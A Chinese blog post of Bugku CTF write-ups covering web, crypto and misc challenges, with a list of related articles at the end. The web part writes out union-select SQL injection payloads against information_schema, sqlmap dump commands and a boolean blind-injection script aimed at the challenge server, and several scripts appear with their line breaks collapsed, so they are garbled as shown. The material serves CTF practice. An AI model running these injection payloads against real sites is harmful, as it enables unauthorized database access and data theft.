题目来源

bugku

WEB

成绩单

传送门

手注


类sql注入题目。

直接查询可以查询到id=3.

1’ order by 1#

1’ order by 2#

到id=5时无返回数据,可以得知有四个字段。

爆当前数据库:

-1' union select 1,2,3,database() #

令id=-1是因为界面只显示一个查询结果,联合查询看不到后面我们要查询的数据,所以使id=-1即不存在的数据即可正常显示我们要查询的数据。

如图:

得知当前使用数据库为skctf_flag.

接着爆表:

-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema='skctf_flag'#

爆字段:

-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name='fl4g'#

查询字段:

-1' union select 1,2,3,skctf_flag from fl4g#

得到flag。

burpsuite+sqlmap

输入1,用burp抓包,复制所抓包内容,在sqlmap的文件夹内另存为一个txt文件:233.txt。

启动sqlmap,

python sqlmap.py -r 233.txt -p id --current-db

-r使sqlmap加载233.txt,-p指定注入用的参数。

可以看到得到了当前的数据库。

继续

 python sqlmap.py -r 233.txt -p id -D skctf_flag --tables

使用fl4g,继续

python sqlmap.py -r 233.txt -p id -D skctf_flag -T fl4g --columns

 python sqlmap.py -r 233.txt -p id -D skctf_flag -T fl4g -C skctf_flag --dump

可以看到正在盲注。

这里讲道理是应该直接爆出来的,但不知出了什么问题无法继续了。。。

python脚本

由1’ and 1=1#返回数据,而1’ and 1=2#不返回数据,可知可进行布尔盲注。

# -*- coding:utf-8 -*-
import requests
import reurl = "http://120.24.86.145:8002/chengjidan/index.php"base_payload = "1' and if(ascii(substr({data},{len},1))>{number},1,0)#" #if(prep1.prep2,prep3) 若表达式prep1为真,则返回prep2,若prep1为假,则返回prep3
#base_payload = "1' and if(ascii(substr(select table_name from information_schema.tables where table_name=database() limit 0,1)>{num},{len},1),1,0)#"
#payload = "database()" #skctf_flag
#payload = "(select table_name from information_schema.tables where table_schema=database() limit 0,1)" #fl4g
#payload = "(select column_name from information_schema.columns where table_name='fl4g' limit 0,1)" #skctf_flag
payload = "(select skctf_flag from fl4g limit 0,1)"information=""for m in range(1,50):for i in range(32,129):post_data = {"id":base_payload.format(data = payload,len = m,number=i)}r = requests.post(url,post_data)resultarr = re.findall(r"<td>(.+?)<td>",r.text)result = ''.join(resultarr)#print result #print r.text#print post_dataif '60' not in result:information += chr(i)break
print information

拿的dalao的,找时间自己写。。。

never give up

一道很有意思的题目。

进入页面,查看源代码。

看到1p.html,访问但却跳转到https://www.bugku.com/

此处应该有__window.location.href__ 的跳转。

我们可以这样查看1p.html的源代码:

view-source:http://123.206.87.240:8006/test/1p.html

发现源代码。

可以看出有url编码和base64加密。分别解密后得到:

<?phpif(!$_GET['id'])
{header('Location: hello.php?id=1');exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.'))
{echo 'no no no no no no no';return ;
}
$data = @file_get_contents($a,'r');
if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{require("f4l2a3g.txt");
}
else
{print "never never never give up !!!";
}
?>

可以审计,但没必要orz。

直接访问f4l2a3g.txt得到flag。

CRYPTO

进制转换

要求将包含二进制,八进制,十进制,十六进制的字符串转换。

写脚本转换为十六进制,再用工具转换成字符串。

脚本:(python3)

str = 'd87 x65 x6c x63 o157 d109 o145 b100000 d116 b1101111 o40 x6b b1100101 b1101100 o141 d105 x62 d101 b1101001 d46 o40 d71 x69 d118 x65 x20 b1111001 o157 b1110101 d32 o141 d32 d102 o154 x61 x67 b100000 o141 d115 b100000 b1100001 d32 x67 o151 x66 d116 b101110 b100000 d32 d102 d108 d97 o147 d123 x31 b1100101 b110100 d98 d102 b111000 d49 b1100001 d54 b110011 x39 o64 o144 o145 d53 x61 b1100010 b1100011 o60 d48 o65 b1100001 x63 b110110 d101 o63 b111001 d97 d51 o70 d55 b1100010 d125 x20 b101110 x20 b1001000 d97 d118 o145 x20 d97 o40 d103 d111 d111 x64 d32 o164 b1101001 x6d o145 x7e'
list = str.split(' ')
for i in range(len(list)):if list[i].startswith('d'):list[i] = hex(int(list[i][1::]))[2::]if list[i].startswith('x'):list[i] = list[i][1::]if list[i].startswith('o'):list[i] = hex(int(list[i][1::],8))[2::]if list[i].startswith('b'):list[i] = hex(int(list[i][1::],2))[2::]
res = ' '
print(res.join(list))

affine

仿射密码。

上脚本:(python2)

#!/user/bin/env python
#-*- coding:utf-8 -*-charlist='abcdefghijklmnopqrstuvwxyz'
newlist=''
a = input("please input the 'a' in the 'y=ax+b' ")
print
b = input("please input the 'b' in the 'y=ax+b' ")
print
for i in range(len(charlist)): newlist+=charlist[(a*i+b)%26]
tstr=raw_input("please input str  ")
print
ostr=''
for char in tstr:ostr+=charlist[newlist.find(char)]
print "result: ",ostr

MISC

好多数值

题目给了一个1.txt

使用python的PIL模块来根据rgb数值画图。
脚本如下:

# -*- coding:utf-8 -*-
from PIL import Image
x = 503     # 对行数61366因数分解,x和y分别是行和列
y = 122
im = Image.new("RGB",(x,y)) # 新建一个图片
f = open("1.txt",'r')  #打开题目文件
for i in range(x):for j in range(y):line = f.readline()pixel = line.split(',')im.putpixel((i,j),(int(pixel[0]),int(pixel[1]),int(pixel[2]))) #为图片的每个坐标点填充像素
im.show()
f.close()

运行结果:
拿到flag。

一些bugku的题目wp相关推荐

  1. Bugku-杂项部分题目WP

    前言 一个新手学习CTFer的成长之路必定要通过大量的刷题,下面是bugku部分题目wp Bugku-MISC-论剑 把图片放进010发现有一串二进制先转ASCII码获得一个关键词,但不知道是什么东西 ...

  2. bugku 杂项 图穷匕见 wp

    bugku 杂项 图穷匕见 wp 1.可能是因为自己比较菜,这题我看别人的wp都看了半天才做出来,中间一些弯路也就不说了,就直接说一下重点.下载后是一张图片 2.看到图的第一眼我想到的是,左边肯定还有 ...

  3. Bugku Misc 清凉一夏 wp

    题目 wp 下载之后得到一个二维码,扫码之后,获得如下内容: 先留着,之后会用到. 查看图片,使用010Editor打开图片,发现里面隐藏着压缩包. 打开kali,使用binwalk分离图片,得到一个 ...

  4. bugku msic 答案wp

    bugku msic 答案wp 前言 May you be happy. wp 1.下载附件之后,获得一个文件,使用010Editor打开之后,发现是jpg格式. 2.修改之后,打开图片,发现左下角有 ...

  5. ISCC 2021 部分题目WP

    ISCC 2021 部分题目WP 题目目录 练武题:web-ISCC客服一号冲冲冲(一) 练武题:web-介是嘛 练武题:web-Web01正则匹配最后的倔强 练武题:web- ISCC客服一号冲冲冲 ...

  6. Bugku杂项题目解析

    Bugku杂项 目录 Bugku杂项 1.签到题 2.这是一张单纯的图片 3.隐写 4.telnet 5.眼见非实(ISCCCTF) 6.啊哒 7.又一张图片,还单纯吗 8.猜 9.宽带信息泄露 10 ...

  7. Bugku 密室逃脱 WP

    一.打开题目 二.解压文件夹,查看文件和压缩包,发现压缩包进行了加密 三.查看剧本,发现摩斯密码,并解析得到电脑密码:xjpc 四.输入电脑密码得到一张图片和一个压缩包,查看图片发现图片位置发生错误, ...

  8. 衡师11月月赛web题目wp

    目录 1.丢三落四的学姐 2.wep?Pwn!!! 这题web部分是buuctf中的DASCTF X GFCTF 2022十月挑战赛!的原题 1.丢三落四的学姐 访问题目位置,很明显的phpstudy ...

  9. NSCTF-部分题目wp

    文章目录 Web-xff Web-sql Web-XXE CRYPTO-神算子 CRYPTO-Catch_the_point CRYPTO-data MISC-docx MISC-BBQ MISC-等 ...

最新文章

  1. 安卓帧数监测软件_土壤墒情监测仪
  2. 【GoldenGate】使用OGG,两个Oracle库之间单向同步数据
  3. (转载)文件系统与数据库系统的区别
  4. Java输入光标在printf前面_C++ 设置控制台(命令行)窗口 光标位置,及前背景颜色
  5. 【面试招聘】聊聊求职过程中的技术面试
  6. java se程序设计_JavaSE--Java 的基本程序设计结构
  7. 不,你根本不需要ML/AI,有SQL就够了
  8. 移动端click事件延迟300ms到底是怎么回事,该如何解决?
  9. JAVA_HOME is not defined Ubuntu中设置JAVA_HOME路径
  10. 服务器项目访问速度,【随心秀】优化1M带宽的云服务器访问速度
  11. 【权限维持】window服务端常见后门技术
  12. Byond公司发布BIS平台,未来开发VR、AR不再繁杂
  13. Win11任务栏大小调整
  14. java分割图片_OpenCV3 Java分割图像 提取图像的RGB三原色(Core.split)
  15. 三星坠落:最糟的日子还没到来
  16. 《程序员》:唯品会双11大促技术保障实践
  17. DDCTF2020 Writeup
  18. 网络安全技术与黑客攻击威胁
  19. 用python对文件内容差异对比
  20. 基于A*算法的迷宫小游戏

热门文章

  1. svn造成桌面图标显示问号的处理办法
  2. 联想 扬天M4000q-11-Hackintosh-Opencore 黑苹果efi引导文件
  3. 数据库系列7:事务与锁的实现原理
  4. 解决MySQL CPU占用100%的经验总结 转
  5. PS基础--水平翻转图像
  6. Selenium自动化下载文件Firefox配置教程
  7. Camera ISO、快门、光圈、曝光这几个概念
  8. android xml加密解密,华为配置加解密工具
  9. mysql存储爬虫图片_世纪佳缘信息爬取存储到mysql,下载图片到本地,从数据库选取账号对其发送消息更新发信状态...
  10. 【洛谷3043】跳楼机(最短路)